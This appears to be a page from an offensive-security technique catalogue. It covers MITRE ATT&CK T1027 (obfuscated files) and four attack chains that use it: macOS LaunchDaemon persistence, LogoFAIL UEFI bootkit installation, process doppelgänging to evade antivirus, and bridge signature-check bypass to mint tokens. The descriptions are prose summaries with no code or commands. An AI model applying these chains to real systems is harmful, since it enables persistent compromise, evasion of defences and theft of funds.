Obfuscated Files or Information
Hide artifacts via encoding, packing, or encryption.
§ Where this technique fits
T1027 is catalogued under the Defense Evasion tactic of the offensive-security kill-chain. It appears in 4 approved dossiers in the registry, typically at step 5.8 on average.
Authoritative reference: attack.mitre.org/techniques/T1027/.
§ Dossiers chaining this technique
- step 5 / 5
LaunchDaemon persistence as root
Once at root (via sudo or a local-exploit), drop a .plist into /Library/LaunchDaemons that re-implants on every boot — survives user logout and full power-cycle.
- step 6 / 6
LogoFAIL → UEFI bootkit → persistent ring-0
Drop a malformed JPG/PNG/BMP into the EFI partition's boot logo path. Vulnerable vendor UEFI parses it pre-OS, executes attacker code before SecureBoot's verifier — install a bootkit that survives wipe + reinstall.
- step 6 / 6
Process doppelgänging → spawn signed image with attacker bytes
Use NTFS transactional file APIs to overlay an attacker image during process creation. The final mapped process differs from the on-disk file — AV sees only the legit signed image at scan time.
- step 6 / 6
Cross-chain bridge validator-set bypass → mint wrapped tokens
Bridge's signature-set check is off-by-one (Nomad-class) or accepts a zero address (Ronin-class). Mint wrapped tokens on the destination chain without locking on the source.